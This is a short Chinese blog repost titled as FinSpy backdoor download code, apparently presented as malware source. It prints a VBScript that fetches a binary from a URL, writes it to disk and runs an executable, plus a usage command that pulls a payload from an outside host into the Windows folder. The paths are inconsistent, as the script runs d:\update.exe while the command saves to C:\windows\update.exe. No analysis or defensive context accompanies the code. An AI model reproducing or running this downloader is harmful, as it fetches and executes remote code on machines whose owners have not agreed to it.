码迷,mamicode.com
首页 > 其他好文 > 详细

FinSpy的后门下载代码

时间:2020-06-25 17:30:10      阅读:64      评论:0      收藏:0      [点我收藏+]

标签:http   res   ODB   open   style   class   window   write   type   

c:\windows\apsou.vbs

Const adTypeBinary = 1  
Const adSaveCreateOverWrite = 2  
Dim BinaryStream  
Set BinaryStream = CreateObject("ADODB.Stream")  
BinaryStream.Type = adTypeBinary  
BinaryStream.Open  
BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))  
BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite  
Function BinaryGetURL(URL)  
Dim Http  
Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")  
Http.Open "GET", URL, False  
Http.Send  
BinaryGetURL = Http.ResponseBody  
End Function  
Set shell = CreateObject("WScript.Shell")  
shell.Run "d:\update.exe" 

调用方法

start C:\\windows\\apsou.vbs http://www.codito.de/b00m/calc.exe C:\\windows\\update.exe

FinSpy的后门下载代码

标签:http   res   ODB   open   style   class   window   write   type   

原文地址:https://www.cnblogs.com/passedbylove/p/13192052.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!